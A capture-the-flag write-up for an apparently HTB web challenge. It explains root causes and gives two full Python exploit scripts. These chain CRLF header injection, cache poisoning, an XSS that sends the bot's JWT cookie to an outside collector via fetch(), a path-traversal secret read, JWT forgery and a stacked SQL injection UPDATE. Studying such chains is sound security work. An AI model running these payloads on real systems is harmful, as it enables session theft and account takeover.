Summary
Description
- Proxy/cacher: Varnish in front of Flask (port 3000) and a Zig “oracle” (port 4000).
- Broken cache key: `vcl_hash` only hashes `req.http.CacheKey` and omits the URL, so all oracle requests can collide.
- CRLF header injection: Zig endpoint `/oracle/:mode/:deviceId` reflects `deviceId` into the `DeviceId` response header without sanitization. Injecting `\r\nHeader: Value` adds arbitrary headers to the backend response.
- Poisoning trick: Visit `/oracle/<html-xss>/<deviceId-with-CRLF>` to:
  - set `CacheKey: enable` (backend response header) → Varnish caches for ~10s;
  - add `Content-Type: text/html` so browsers parse body as HTML (not JSON);
  - body contains our `<script>` (since we used an HTML `mode`), but the cached object is served for any `/oracle/json/*` due to the broken hash, so the bot’s `/oracle/json/{1..15}` fetch executes our XSS.
- Post-XSS: Bot leaks `jwt` cookie (moderator).
- Privilege escalation:
  - LFI/path traversal: `/controller/firmware` POST `patch=/app/jwt_secret.txt` returns the HS256 secret.
  - JWT forge: Craft `account_type=administrator` JWT.
  - Signature guard bypass (SQLi): `/controller/device/<id>` builds SQL with f-string and `multi=True`. Use `';UPDATE signatures SET signature='<your_sig>' WHERE user_id=1;SELECT 1;--` to align DB-stored signature with your forged token.
  - Flag: `/controller/admin` renders `os.popen("/readflag").read()`, printing `HTB{...}`.
Analyst
Root causes
- Varnish `vcl_hash` uses only `req.http.CacheKey` → the cache key ignores the URL, so unrelated requests collide.
- Oracle writes `DeviceId` header with unsanitized path data → classic CRLF response-splitting.
- Flask firmware preview reads arbitrary absolute path (`/app/jwt_secret.txt`) → LFI.
- Device fetch uses f-string + `multi=True` → SQL injection (stacked queries).
- JWT “signature pinning” stored in DB is bypassable by SQLi.
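To make the first root cause concrete, here is a toy model of the cache-key collision. It is a sketch under assumptions, not the challenge's VCL: `ToyCache`, `broken_hash`, `url_aware_hash`, and `backend` are hypothetical names, and the model caches every response, ignoring the `CacheKey: enable` condition and the ~10s TTL.

```python
import hashlib


def broken_hash(url: str, headers: dict) -> str:
    # Models the described vcl_hash: only the CacheKey request header is hashed.
    return hashlib.sha256(headers.get("CacheKey", "").encode()).hexdigest()


def url_aware_hash(url: str, headers: dict) -> str:
    # A conventional key that also covers the URL and Host header.
    material = "|".join([url, headers.get("Host", ""), headers.get("CacheKey", "")])
    return hashlib.sha256(material.encode()).hexdigest()


class ToyCache:
    """Hypothetical in-memory cache keyed by a pluggable hash function."""

    def __init__(self, hash_fn):
        self.hash_fn = hash_fn
        self.store = {}

    def fetch(self, url, headers, backend):
        key = self.hash_fn(url, headers)
        if key in self.store:
            return self.store[key], "HIT"
        body = backend(url)
        self.store[key] = body
        return body, "MISS"


def backend(url: str) -> str:
    # Hypothetical backend that just echoes the requested URL.
    return f"response for {url}"


# Attacker request first, then the bot's request for a different URL.
broken = ToyCache(broken_hash)
broken.fetch("/oracle/<script>/7", {}, backend)
body, state = broken.fetch("/oracle/json/3", {}, backend)
print(state, body)  # HIT response for /oracle/<script>/7

fixed = ToyCache(url_aware_hash)
fixed.fetch("/oracle/<script>/7", {}, backend)
fixed_body, fixed_state = fixed.fetch("/oracle/json/3", {}, backend)
print(fixed_state, fixed_body)  # MISS response for /oracle/json/3
```

With the URL left out of the key, neither request sends a `CacheKey` header, so both hash to the same value and the second one is served the attacker's object.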
Impact chain
CRLF resp-split → cache-poison HTML → bot XSS → JWT theft → read secret → forge admin → SQLi signature → admin route → SUID /readflag → flag.
Exploit
1) Poison cache with XSS (example)
GET /oracle/%3Cscript%3Efetch(`https://<your-collector>/?cookie=${document.cookie}`)%3C/script%3E/7%0D%0ACacheKey:%20enable%0D%0AContent-Type:%20text%2Fhtml HTTP/1.1
Host: localhost:1337
Connection: close
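- The request line above is abbreviated for readability. When actually sent, the whole `mode` segment must be percent-encoded (including `/`, `?`, and backticks), as `quote(mode, safe="")` does in the poisoning script; otherwise the `/` and `?` inside the exfil URL would split the path.
- Wait ≤10s for the bot to hit `/oracle/json/<rand>` and exfil the cookie.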
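The header injection in this step can be illustrated offline. The sketch below assumes the oracle URL-decodes the `deviceId` path segment and writes it verbatim into a header line; `render_headers` and `parse_headers` are hypothetical stand-ins, not the Zig code.

```python
from urllib.parse import unquote


def render_headers(device_id: str) -> bytes:
    # Toy stand-in for the oracle: reflects deviceId into a header unsanitized.
    return f"HTTP/1.1 200 OK\r\nDeviceId: {device_id}\r\n\r\n".encode()


def parse_headers(raw: bytes) -> dict:
    # Parse the header block the way a proxy or browser would see it.
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    lines = head.split("\r\n")[1:]  # skip the status line
    return dict(line.split(": ", 1) for line in lines)


# The deviceId segment from the example request, still percent-encoded.
segment = "7%0D%0ACacheKey:%20enable%0D%0AContent-Type:%20text%2Fhtml"
device_id = unquote(segment)

headers = parse_headers(render_headers(device_id))
print(headers)
# {'DeviceId': '7', 'CacheKey': 'enable', 'Content-Type': 'text/html'}
```

A single reflected value ends up as three separate response headers, which is what lets the request switch on caching and change the content type at once.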
2) Use stolen moderator JWT
- Verify it works on `/controller/home`.
3) Read HS256 secret
- POST `/controller/firmware` with `patch=/app/jwt_secret.txt` → get secret.
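Before forging anything, it can be worth checking that the recovered secret really is the signing key by recomputing the stolen token's signature. This is a minimal sketch assuming a standard three-part HS256 JWT; `secret_matches` is a hypothetical helper, and the sample token and secret are made up for the demonstration.

```python
import base64
import hashlib
import hmac


def b64url(data: bytes) -> str:
    # Base64url without padding, as used in JWTs.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def sign(signing_input: str, secret: str) -> str:
    digest = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return b64url(digest)


def secret_matches(token: str, secret: str) -> bool:
    # Recompute the HS256 signature over "header.payload" and compare.
    head, body, sig = token.split(".")
    return hmac.compare_digest(sign(f"{head}.{body}", secret), sig)


# Made-up token signed with a made-up secret, standing in for the stolen JWT.
head = b64url(b'{"alg":"HS256","typ":"JWT"}')
body = b64url(b'{"user_id":1}')
sample_token = f"{head}.{body}.{sign(f'{head}.{body}', 'demo-secret')}"

print(secret_matches(sample_token, "demo-secret"))   # True
print(secret_matches(sample_token, "wrong-secret"))  # False
```

If the check fails on the real token, a likely cause is stray whitespace in the file contents, which is why the helper script strips the response before using it.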
4) Forge admin JWT
- Build an HS256 token (header + payload) with `{"user_id":1,"username":"adminified","account_type":"administrator"}`, signed with the recovered secret.
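To see which claims the forged payload has to carry, the stolen token can be decoded without verifying it. The sketch below assumes a standard three-part JWT; `jwt_claims` is a hypothetical helper, and the sample token (including the `mod` username and the `moderator` account type) is invented for illustration.

```python
import base64
import json


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token: str):
    # Return (header, payload) as dicts; the signature is ignored here.
    head, body, _sig = token.split(".")
    return json.loads(b64url_decode(head)), json.loads(b64url_decode(body))


def _b64url_json(obj) -> str:
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


# Invented sample standing in for the exfiltrated moderator token.
sample = ".".join([
    _b64url_json({"alg": "HS256", "typ": "JWT"}),
    _b64url_json({"user_id": 1, "username": "mod", "account_type": "moderator"}),
    "sig-placeholder",
])

header, claims = jwt_claims(sample)
print(header["alg"], claims["account_type"])  # HS256 moderator
```

The forged payload then keeps the same claim names and changes only the values needed for the administrator role.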
5) SQLi to align signature
- GET `/controller/device/1';UPDATE signatures SET signature='<jwt_sig>' WHERE user_id=1;SELECT 1;--` (the helper script appends ` a` after `--` and URL-encodes the whole segment before sending).
- Now the server accepts your forged admin cookie.
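The stacked-query effect can be reproduced locally. This sketch uses `sqlite3.executescript` as a stand-in for a `multi=True` execution, and the `devices` table and the shape of the `SELECT` are assumptions; only the `signatures` table and its `signature` and `user_id` columns come from the payload above.

```python
import sqlite3


def build_query(device_id: str) -> str:
    # Hypothetical reconstruction of the vulnerable f-string query.
    return f"SELECT * FROM devices WHERE device_id = '{device_id}'"


conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE devices (device_id TEXT, name TEXT);
    CREATE TABLE signatures (user_id INTEGER, signature TEXT);
    INSERT INTO devices VALUES ('1', 'camera');
    INSERT INTO signatures VALUES (1, 'original_sig');
    """
)

payload = "1';UPDATE signatures SET signature='forged_sig' WHERE user_id=1;SELECT 1;-- a"
query = build_query(payload)
print(query)

# executescript runs every statement in the string, like a multi-statement execute.
conn.executescript(query)

stored = conn.execute(
    "SELECT signature FROM signatures WHERE user_id = 1"
).fetchone()[0]
print(stored)  # forged_sig
```

The closing quote ends the intended string literal, the `UPDATE` runs as its own statement, and the trailing comment swallows the leftover quote from the original query.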
6) Grab flag
- GET `/controller/admin` → page includes output of `/readflag` → `HTB{...}`.
Two helper scripts are included below:
- Poison/watch bot: polls `/controller/bot_running`, poisons with CRLF, logs cache headers.
- Escalate & dump flag: uses stolen JWT → read secret → forge admin → SQLi signature → fetch flag (with optional rollback).
Result
- Successfully retrieved the flag: `HTB{f4k3_fl4g_f0r_t35t1ng}` (placeholder; on the real instance this will be randomized).
- Demonstrated a full end-to-end chain combining CRLF response-splitting cache poisoning, headless-bot XSS, LFI, JWT forgery, and stacked SQLi to reach a SUID-backed flag reader.
#!/usr/bin/env python3
import argparse
import time
import requests
from urllib.parse import quote

# -------------------- config --------------------
DEFAULT_EXFIL = "https://lvaf27y0.requestrepo.com/?cookie=${document.cookie}"
TTL_SECONDS = 10  # Varnish TTL when CacheKey: enable

# -------------------- helpers --------------------
def log(msg):
    print(f"[{time.strftime('%H:%M:%S')}] {msg}", flush=True)

def get(url, **kw):
    try:
        return requests.get(url, timeout=8, allow_redirects=False, **kw)
    except Exception as e:
        log(f"GET {url} -> ERROR: {e}")
        return None

def poll_bot_running(base):
    r = get(f"{base}/controller/bot_running")
    if not r:
        return None
    try:
        # endpoint returns plain text: "running" or "not_running"
        return r.text.strip()
    except Exception:
        return None

def build_poison_url(base, exfil, device_id_base="7"):
    """
    We serve HTML (not JSON) with inline <script> XSS via the `mode` path segment
    AND inject response headers via CRLF in the `deviceId` path segment:
        CacheKey: enable        -> enables caching for ~10s
        Content-Type: text/html -> makes browser treat it as HTML
    """
    mode = f"<script>fetch(`{exfil}`)</script>"
    mode_enc = quote(mode, safe="")  # %3Cscript%3E...%3C%2Fscript%3E
    # CRLF-inject response headers into the DeviceId header that Zig sets:
    injected_device = (
        f"{device_id_base}"
        f"%0D%0ACacheKey:%20enable"
        f"%0D%0AContent-Type:%20text%2Fhtml"
    )
    return f"{base}/oracle/{mode_enc}/{injected_device}"

def verify_hit(base):
    """
    Fetch a random json endpoint. If poisoned, we should get:
        - X-Cache: HIT
        - Content-Type: text/html
        - body containing our <script>
    """
    # Any /oracle/json/<id> should collide on the empty CacheKey hash
    test_url = f"{base}/oracle/json/1"
    r = get(test_url)
    if not r:
        return False
    xcache = r.headers.get("X-Cache")
    ctype = r.headers.get("Content-Type")
    body = r.text[:200].replace("\n", " ")
    log(f"VERIFY GET {test_url} -> {r.status_code} X-Cache={xcache} Content-Type={ctype}")
    log(f"Body[0:200]: {body}")
    return (ctype and "text/html" in ctype and xcache == "HIT" and "<script>" in r.text)

# -------------------- main flow --------------------
def main():
    ap = argparse.ArgumentParser(description="HTB OmniWatch bot watcher + cache poisoner")
    ap.add_argument("--host", default="http://127.0.0.1", help="scheme://host (default http://127.0.0.1)")
    ap.add_argument("--port", default=1337, type=int, help="port (default 1337)")
    ap.add_argument("--exfil", default=DEFAULT_EXFIL, help="exfil URL used inside the <script> fetch(...)")
    ap.add_argument("--wait-after-running", type=float, default=2.0,
                    help="seconds to wait after bot enters 'running' before poisoning (default 2.0)")
    ap.add_argument("--loop", action="store_true", help="keep looping to catch future bot runs")
    args = ap.parse_args()

    base = f"{args.host}:{args.port}"
    log(f"Target base: {base}")
    log("Polling /controller/bot_running...")

    while True:
        status = poll_bot_running(base)
        if status is None:
            time.sleep(0.5)
            continue
        log(f"bot_running = {status}")
        if status != "running":
            # back off while the bot is idle instead of polling in a tight loop
            time.sleep(0.5)
            continue

        # give the bot a beat to finish login (the bot sleeps ~3s after loading /login)
        time.sleep(max(0.0, args.wait_after_running))

        # -------- Poison --------
        poison_url = build_poison_url(base, args.exfil)
        log(f"POISON -> {poison_url}")
        r = get(poison_url)
        if r is not None:
            # print debug headers
            xcache = r.headers.get("X-Cache")
            hits = r.headers.get("X-Cache-Hits")
            devid = r.headers.get("DeviceId")
            ctype = r.headers.get("Content-Type")
            log(f"Poison resp: {r.status_code} X-Cache={xcache} Hits={hits} DeviceId={devid} Content-Type={ctype}")
            log(f"Poison body[0:160]: {r.text[:160].replace(chr(10),' ')}")

        # -------- Verify --------
        # verify_hit, --loop, and TTL_SECONDS were defined but unused; this wiring is an assumed flow
        log("Poison confirmed" if verify_hit(base) else "Poison not confirmed")
        if not args.loop:
            break
        # let the cached object expire before the next attempt
        time.sleep(TTL_SECONDS)

if __name__ == "__main__":
    main()

#!/usr/bin/env python3
import argparse, base64, hashlib, hmac, json, re, sys, time
from urllib.parse import quote
import requests

# ---------- utils ----------
def b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

def mk_jwt(payload: dict, secret: str) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    p_json = json.dumps(payload, separators=(",", ":")).encode()
    h_json = json.dumps(header, separators=(",", ":")).encode()
    head = b64url(h_json)
    body = b64url(p_json)
    sig = b64url(hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest())
    return f"{head}.{body}.{sig}"

def jwt_sig(jwt: str) -> str:
    return jwt.split(".")[-1]

def log(*a):
    print("[*]", *a, flush=True)

def get(sess, url, **kw):
    return sess.get(url, timeout=8, allow_redirects=False, **kw)

def post(sess, url, **kw):
    return sess.post(url, timeout=8, allow_redirects=False, **kw)

# ---------- exploit steps ----------
def verify_moderator(sess, base):
    r = get(sess, f"{base}/controller/home")
    if r.status_code != 200:
        raise RuntimeError(f"moderator cookie not accepted: {r.status_code}")
    log("Moderator access OK")

def read_jwt_secret(sess, base) -> str:
    # Path traversal via firmware preview
    data = {"patch": "/app/jwt_secret.txt"}
    r = post(sess, f"{base}/controller/firmware", data=data)
    if r.status_code != 200 or not r.text.strip():
        raise RuntimeError(f"failed reading jwt secret: {r.status_code}")
    secret = r.text.strip()
    log("Read jwt_secret.txt:", secret[:16] + ("..." if len(secret) > 16 else ""))
    return secret

def sqli_update_signature(sess, base, new_sig: str, user_id: int = 1):
    # /controller/device/<id> is vulnerable: f-string + multi=True
    inj = f"1';UPDATE signatures SET signature='{new_sig}' WHERE user_id={user_id};SELECT 1;-- a"
    url = f"{base}/controller/device/{quote(inj, safe='')}"
    r = get(sess, url)
    if r.status_code not in (200, 302):
        raise RuntimeError(f"SQLi update failed: HTTP {r.status_code}")
    log("Signatures table updated for user_id", user_id)

def get_flag(sess, base) -> str:
    r = get(sess, f"{base}/controller/admin")
    if r.status_code != 200:
        raise RuntimeError(f"admin fetch failed: {r.status_code}")
    m = re.search(r"HTB\{[^\}]+\}", r.text)
    if not m:
        # keep the page for offline inspection
        with open("/tmp/admin.html", "w") as fh:
            fh.write(r.text)
        raise RuntimeError("Flag not found in admin page (saved /tmp/admin.html)")
    return m.group(0)

def main():
    ap = argparse.ArgumentParser(description="HTB OmniWatch: escalate moderator -> admin -> flag via JWT+SQLi")
    ap.add_argument("--host", default="http://127.0.0.1", help="scheme://host (default http://127.0.0.1)")
    ap.add_argument("--port", type=int, default=1337, help="port (default 1337)")
    ap.add_argument("--stolen-jwt", required=True, help="the moderator JWT you exfiltrated")
    ap.add_argument("--user-id", type=int, default=1, help="user_id of the moderator (default 1)")
    ap.add_argument("--rollback", action="store_true", help="restore original signature after grabbing flag")
    args = ap.parse_args()

    base = f"{args.host}:{args.port}"
    sess = requests.Session()
    # Use stolen moderator cookie
    sess.cookies.set("jwt", args.stolen_jwt, path="/")
    log("Target:", base)
    verify_moderator(sess, base)

    # 1) Read server-side JWT secret
    secret = read_jwt_secret(sess, base)

    # 2) Forge an admin JWT for same user_id
    admin_payload = {
        "user_id": args.user_id,
        "username": "adminified",
        "account_type": "administrator"
    }
    admin_jwt = mk_jwt(admin_payload, secret)
    new_sig = jwt_sig(admin_jwt)
    old_sig = jwt_sig(args.stolen_jwt)
    log("Old sig:", old_sig[:10], "... New sig:", new_sig[:10], "...")

    # 3) SQLi to update signatures.signature to our new token's signature
    sqli_update_signature(sess, base, new_sig, user_id=args.user_id)

    # 4) Swap cookie to our forged admin token and read flag
    sess.cookies.set("jwt", admin_jwt, path="/")
    flag = get_flag(sess, base)
    log("FLAG:", flag)

    # 5) Optional rollback so bot keeps working with its original cookie
    if args.rollback:
        log("Rolling back signature to original…")
        try:
            sqli_update_signature(sess, base, old_sig, user_id=args.user_id)
            log("Rollback OK")
        except Exception as e:
            log("Rollback failed:", e)

if __name__ == "__main__":
    try:
        main()
    except Exception as e:
        log("ERROR:", e)
        sys.exit(1)